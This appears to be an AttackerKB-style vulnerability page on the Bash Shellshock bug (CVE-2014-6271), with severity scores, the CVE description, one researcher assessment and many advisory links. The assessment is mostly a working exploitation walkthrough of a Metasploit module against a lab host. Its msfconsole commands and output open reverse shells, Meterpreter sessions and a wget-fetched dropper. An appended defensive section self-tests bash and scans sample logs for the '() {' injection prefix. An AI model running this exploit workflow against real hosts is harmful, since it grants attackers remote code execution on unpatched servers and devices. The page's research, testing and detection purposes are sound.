9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
0.976 High
EPSS
Percentile
100.0%
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka “ShellShock.” NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
Recent assessments:
h00die-gr3y at May 21, 2023 3:28pm UTC reported:
A Golden Oldie from 2014 that is still very relevant nowadays.
In my recent research of security vulnerabilities, I bumped into several targets that were still vulnerable to CVE-2014-6271 a.k.a. Shellshock and CVE-2014-6278. You should not be surprised that most of these targets are IoT based with an embedded Linux/Unix image running a vulnerable bash version. They typically do not get updated at all and are easy targets for a malicious actor to find an entry point into the network.
Metasploit modules like exploit/multi/http/apache_mod_cgi_bash_env_exec are pretty restricted to launch an attack due to the limited platform support (only x86) and payloads that can be leveraged in an attack. This brought me to rewrite this module a bit so that it would support multiple platforms (ARM, x86, x64, MIPS) and multiple payloads such as Unix Command and Linux Dropper. The module name is multi/http/bash_env_cgi_rce.
To test the module locally, download a vulnerable bash version from <https://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz>. Any version published before September 2014 is okay. Just extract it in a local directory and compile it with ./configure && make.
Configure Apache or any other preferred web server to support CGI scripts. You can find tons of instructions on the web on how to do that.
Just create a script like the one below using the vulnerable bash version and add it to the cgi-bin directory of your preferred web server.
#!/bin/bash_CVE_2014_6271
echo "Content-type: text/plain"
echo
echo
echo "Hello World"
Download the module from here and follow the install instructions.
Start msfconsole and play around with the different options and payloads.
msf6 > use exploits/multi/http/bash_env_cgi_rce
[*] Using configured payload cmd/unix/reverse_bash
msf6 exploit(multi/http/bash_env_cgi_rce) > options
Module options (exploit/multi/http/bash_env_cgi_rce):
Name         Current Setting  Required  Description
----         ---------------  --------  -----------
CVE          Automatic        yes       CVE to check/exploit (Accepted: Automatic, CVE-2014-6271, CVE-2014-6278)
HEADER       User-Agent       yes       HTTP header to use
METHOD       GET              yes       HTTP method to use
PAYLOADSIZE  2048             yes       Payload size used by the CmdStager
Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT        80               yes       The target port (TCP)
SSL          false            no        Negotiate SSL/TLS for outgoing connections
SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
TARGETURI                     yes       Path to CGI script
URIPATH                       no        The URI to use for this exploit (default is random)
VHOST                         no        HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT  8080             yes       The local port to listen on.
Payload options (cmd/unix/reverse_bash):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Unix Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/bash_env_cgi_rce) > set rhosts 192.168.201.10
rhosts => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set targeturi /cgi-bin/test.cgi
targeturi => /cgi-bin/test.cgi
msf6 exploit(multi/http/bash_env_cgi_rce) > check
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] 192.168.201.10:80 - The target is vulnerable.
msf6 exploit(multi/http/bash_env_cgi_rce) > set lhost 192.168.201.10
lhost => 192.168.201.10
msf6 exploit(multi/http/bash_env_cgi_rce) > set lport 4444
lport => 4444
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/reverse_bash using vulnerability CVE-2014-6271.
[*] Command shell session 1 opened (192.168.201.10:4444 -> 192.168.201.10:35766) at 2023-05-21 15:01:17 +0000
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uname -a
Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03) aarch64 GNU/Linux
Python Meterpreter payload example
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp using vulnerability CVE-2014-6271.
[*] Sending stage (24772 bytes) to 192.168.201.10
[*] Meterpreter session 2 opened (192.168.201.10:4444 -> 192.168.201.10:35678) at 2023-05-21 15:03:48 +0000
meterpreter > sysinfo
Computer : cerberus
OS : Linux 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-03)
Architecture : aarch64
Meterpreter : python/linux
meterpreter > getuid
Server username: www-data
meterpreter >
Linux File dropper using payload: linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set target 1
target => 1
msf6 exploit(multi/http/bash_env_cgi_rce) > set payload linux/aarch64/meterpreter_reverse_tcp
payload => linux/aarch64/meterpreter_reverse_tcp
msf6 exploit(multi/http/bash_env_cgi_rce) > set CMDSTAGER::FLAVOR wget
CMDSTAGER::FLAVOR => wget
msf6 exploit(multi/http/bash_env_cgi_rce) > exploit
[*] Started reverse TCP handler on 192.168.201.10:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target is vulnerable for CVE-2014-6271.
[*] Target is vulnerable for CVE-2014-6278.
[+] The target is vulnerable.
[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp using vulnerability CVE-2014-6271.
[*] Using URL: http://192.168.201.10:8080/ZzirBKe
[*] Client 192.168.201.10 (Wget/1.21.3) requested /ZzirBKe
[*] Sending payload to 192.168.201.10 (Wget/1.21.3)
[*] Meterpreter session 3 opened (192.168.201.10:4444 -> 192.168.201.10:34346) at 2023-05-21 15:10:11 +0000
[*] Command Stager progress - 100.00% done (114/114 bytes)
[*] Server stopped.
meterpreter > sysinfo
Computer : 192.168.201.10
OS : Debian (Linux 5.15.44-Re4son-v8l+)
Architecture : aarch64
BuildTuple : aarch64-linux-musl
Meterpreter : aarch64/linux
meterpreter > getuid
Server username: www-data
meterpreter >
If you use the CMDSTAGER::FLAVOR option bourne or printf, please ensure that your payload size is 2048 or below. You can control this with the option PAYLOADSIZE.
Have fun !!!
Metasploit module multi/http/bash_env_cgi_rce
Assessed Attacker Value: 5
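The following is an added example; it is not code from this page, from the CVE record, or from the author of the bash_env_cgi_rce module, and the function and variable names are my own. It takes the mechanism stated in the CVE description (bash keeps parsing the string that trails an exported function definition and runs it at startup) and the CGI test setup in the assessment above, and shows the two checks a defender wants from them: a self-test that tells a patched bash from a vulnerable one without doing anything beyond echoing a marker, and a scan over access-log lines for the "() {" prefix that any exploit of this bug has to carry in a header the web server exports into the CGI environment. The log lines are constructed for the example, not captured from a real server.

```shell
# Added example; not code from the AttackerKB page, the CVE record, or the
# bash_env_cgi_rce module's author. Names are the example's own.

# Prints VULNERABLE and returns 0 if the bash in $1 (default: the bash on
# PATH) executes the command that trails an exported function definition;
# prints "patched" and returns 1 otherwise; returns 2 if the binary is not
# found. The trailing command only echoes a marker, so the probe changes
# nothing on the host.
shellshock_self_test() {
    st_bash="${1:-bash}"
    st_marker="cve_2014_6271_marker"
    command -v "$st_bash" >/dev/null 2>&1 || { echo "not found: $st_bash"; return 2; }
    # A patched bash stops at the closing brace (newer builds also warn on
    # stderr about an ignored function definition attempt); an unpatched one
    # prints the marker while importing the environment, before ':' runs.
    st_out=$(env "PROBE=() { :; }; echo $st_marker" "$st_bash" -c ':' 2>/dev/null)
    case "$st_out" in
        *"$st_marker"*) echo VULNERABLE; return 0 ;;
        *)              echo patched;    return 1 ;;
    esac
}

# Writes four constructed (not captured) Apache combined-format log lines to
# the file named in $1: two carry the "() {" prefix in a header that mod_cgi
# exports into the script's environment (User-Agent, then Referer), and two
# are benign requests.
write_sample_log() {
    cat > "$1" <<'EOF'
203.0.113.7 - - [21/May/2023:15:01:17 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "() { :;}; echo probe"
203.0.113.7 - - [21/May/2023:15:01:18 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "() { :;}; echo probe" "Mozilla/5.0"
198.51.100.4 - - [21/May/2023:15:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.4 - - [21/May/2023:15:02:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 "-" "curl/7.88.1"
EOF
}

# Prints the number of lines in log file $1 that contain the function
# definition prefix "() {" (any whitespace between the parentheses and the
# brace). Apache maps request headers into HTTP_* environment variables for
# CGI, so the whole line is searched rather than a single header field.
# "|| true" keeps the count (0) printable when grep finds nothing.
count_shellshock_probes() {
    grep -c -E '\(\)[[:space:]]*\{' "$1" || true
}

# Stand-alone run: self-test the local bash, then scan the constructed log.
demo_log=$(mktemp)
write_sample_log "$demo_log"
printf 'local bash: %s\n' "$(shellshock_self_test || true)"
printf 'log lines with the "() {" prefix: %s\n' "$(count_shellshock_probes "$demo_log")"
rm -f "$demo_log"
```

On a host running any bash released after the September 2014 fixes the self-test prints "patched"; on the locally built bash 4.3 from the assessment, passed as `shellshock_self_test ./bash`, it prints VULNERABLE. The log scan is deliberately broad: it matches the prefix wherever it appears in the line, which also catches probes carried in Referer, Cookie, or custom headers rather than only User-Agent.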
advisories.mageia.org/MGASA-2014-0388.html
archives.neohapsis.com/archives/bugtraq/2014-10/0101.html
jvn.jp/en/jp/JVN55667175/index.html
jvndb.jvn.jp/jvndb/JVNDB-2014-000126
kb.juniper.net/InfoCenter/index?page=content&id=JSA10673
lcamtuf.blogspot.com/2014/09/quick-notes-about-bash-bug-its-impact.html
linux.oracle.com/errata/ELSA-2014-1293.html
linux.oracle.com/errata/ELSA-2014-1294.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00028.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00029.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00034.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00037.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00040.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00044.html
lists.opensuse.org/opensuse-security-announce/2014-09/msg00049.html
lists.opensuse.org/opensuse-security-announce/2014-10/msg00004.html
lists.opensuse.org/opensuse-updates/2014-10/msg00023.html
lists.opensuse.org/opensuse-updates/2014-10/msg00025.html
marc.info/?l=bugtraq&m=141216207813411&w=2
marc.info/?l=bugtraq&m=141216668515282&w=2
marc.info/?l=bugtraq&m=141235957116749&w=2
marc.info/?l=bugtraq&m=141319209015420&w=2
marc.info/?l=bugtraq&m=141330425327438&w=2
marc.info/?l=bugtraq&m=141330468527613&w=2
marc.info/?l=bugtraq&m=141345648114150&w=2
marc.info/?l=bugtraq&m=141383026420882&w=2
marc.info/?l=bugtraq&m=141383081521087&w=2
marc.info/?l=bugtraq&m=141383138121313&w=2
marc.info/?l=bugtraq&m=141383196021590&w=2
marc.info/?l=bugtraq&m=141383244821813&w=2
marc.info/?l=bugtraq&m=141383304022067&w=2
marc.info/?l=bugtraq&m=141383353622268&w=2
marc.info/?l=bugtraq&m=141383465822787&w=2
marc.info/?l=bugtraq&m=141450491804793&w=2
marc.info/?l=bugtraq&m=141576728022234&w=2
marc.info/?l=bugtraq&m=141577137423233&w=2
marc.info/?l=bugtraq&m=141577241923505&w=2
marc.info/?l=bugtraq&m=141577297623641&w=2
marc.info/?l=bugtraq&m=141585637922673&w=2
marc.info/?l=bugtraq&m=141694386919794&w=2
marc.info/?l=bugtraq&m=141879528318582&w=2
marc.info/?l=bugtraq&m=142113462216480&w=2
marc.info/?l=bugtraq&m=142118135300698&w=2
marc.info/?l=bugtraq&m=142358026505815&w=2
marc.info/?l=bugtraq&m=142358078406056&w=2
marc.info/?l=bugtraq&m=142546741516006&w=2
marc.info/?l=bugtraq&m=142719845423222&w=2
marc.info/?l=bugtraq&m=142721162228379&w=2
marc.info/?l=bugtraq&m=142805027510172&w=2
packetstormsecurity.com/files/128517/VMware-Security-Advisory-2014-0010.html
packetstormsecurity.com/files/128567/CA-Technologies-GNU-Bash-Shellshock.html
packetstormsecurity.com/files/128573/Apache-mod_cgi-Remote-Command-Execution.html
packetstormsecurity.com/files/137376/IPFire-Bash-Environment-Variable-Injection-Shellshock.html
packetstormsecurity.com/files/161107/SonicWall-SSL-VPN-Shellshock-Remote-Code-Execution.html
rhn.redhat.com/errata/RHSA-2014-1293.html
rhn.redhat.com/errata/RHSA-2014-1294.html
rhn.redhat.com/errata/RHSA-2014-1295.html
rhn.redhat.com/errata/RHSA-2014-1354.html
seclists.org/fulldisclosure/2014/Oct/0
secunia.com/advisories/58200
secunia.com/advisories/59272
secunia.com/advisories/59737
secunia.com/advisories/59907
secunia.com/advisories/60024
secunia.com/advisories/60034
secunia.com/advisories/60044
secunia.com/advisories/60055
secunia.com/advisories/60063
secunia.com/advisories/60193
secunia.com/advisories/60325
secunia.com/advisories/60433
secunia.com/advisories/60947
secunia.com/advisories/61065
secunia.com/advisories/61128
secunia.com/advisories/61129
secunia.com/advisories/61188
secunia.com/advisories/61283
secunia.com/advisories/61287
secunia.com/advisories/61291
secunia.com/advisories/61312
secunia.com/advisories/61313
secunia.com/advisories/61328
secunia.com/advisories/61442
secunia.com/advisories/61471
secunia.com/advisories/61485
secunia.com/advisories/61503
secunia.com/advisories/61542
secunia.com/advisories/61547
secunia.com/advisories/61550
secunia.com/advisories/61552
secunia.com/advisories/61565
secunia.com/advisories/61603
secunia.com/advisories/61633
secunia.com/advisories/61641
secunia.com/advisories/61643
secunia.com/advisories/61654
secunia.com/advisories/61676
secunia.com/advisories/61700
secunia.com/advisories/61703
secunia.com/advisories/61711
secunia.com/advisories/61715
secunia.com/advisories/61780
secunia.com/advisories/61816
secunia.com/advisories/61855
secunia.com/advisories/61857
secunia.com/advisories/61873
secunia.com/advisories/62228
secunia.com/advisories/62312
secunia.com/advisories/62343
support.apple.com/kb/HT6495
support.novell.com/security/cve/CVE-2014-6271.html
tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
www-01.ibm.com/support/docview.wss?uid=isg3T1021272
www-01.ibm.com/support/docview.wss?uid=isg3T1021279
www-01.ibm.com/support/docview.wss?uid=isg3T1021361
www-01.ibm.com/support/docview.wss?uid=ssg1S1004879
www-01.ibm.com/support/docview.wss?uid=ssg1S1004897
www-01.ibm.com/support/docview.wss?uid=ssg1S1004898
www-01.ibm.com/support/docview.wss?uid=ssg1S1004915
www-01.ibm.com/support/docview.wss?uid=swg21685541
www-01.ibm.com/support/docview.wss?uid=swg21685604
www-01.ibm.com/support/docview.wss?uid=swg21685733
www-01.ibm.com/support/docview.wss?uid=swg21685749
www-01.ibm.com/support/docview.wss?uid=swg21685914
www-01.ibm.com/support/docview.wss?uid=swg21686084
www-01.ibm.com/support/docview.wss?uid=swg21686131
www-01.ibm.com/support/docview.wss?uid=swg21686246
www-01.ibm.com/support/docview.wss?uid=swg21686445
www-01.ibm.com/support/docview.wss?uid=swg21686447
www-01.ibm.com/support/docview.wss?uid=swg21686479
www-01.ibm.com/support/docview.wss?uid=swg21686494
www-01.ibm.com/support/docview.wss?uid=swg21687079
www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5096315
www.debian.org/security/2014/dsa-3032
www.kb.cert.org/vuls/id/252743
www.mandriva.com/security/advisories?name=MDVSA-2015:164
www.novell.com/support/kb/doc.php?id=7015701
www.novell.com/support/kb/doc.php?id=7015721
www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html
www.qnap.com/i/en/support/con_show.php?cid=61
www.securityfocus.com/archive/1/533593/100/0/threaded
www.securityfocus.com/bid/70103
www.ubuntu.com/usn/USN-2362-1
www.us-cert.gov/ncas/alerts/TA14-268A
www.vmware.com/security/advisories/VMSA-2014-0010.html
www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0
access.redhat.com/articles/1200223
access.redhat.com/node/1200223
bugzilla.redhat.com/show_bug.cgi?id=1141597
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
help.ecostruxureit.com/display/public/UADCO8x/StruxureWare+Data+Center+Operation+Software+Vulnerability+Fixes
kb.bluecoat.com/index?page=content&id=SA82
kb.juniper.net/InfoCenter/index?page=content&id=JSA10648
kc.mcafee.com/corporate/index?page=content&id=SB10085
securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack
support.apple.com/kb/HT6535
support.citrix.com/article/CTX200217
support.citrix.com/article/CTX200223
support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html
support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04497075
support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-c04518183
supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673&src=securityAlerts
www.arista.com/en/support/advisories-notices/security-advisories/1008-security-advisory-0006
www.exploit-db.com/exploits/34879
www.exploit-db.com/exploits/37816
www.exploit-db.com/exploits/38849
www.exploit-db.com/exploits/39918
www.exploit-db.com/exploits/40619
www.exploit-db.com/exploits/40938
www.exploit-db.com/exploits/42938
www.suse.com/support/shellshock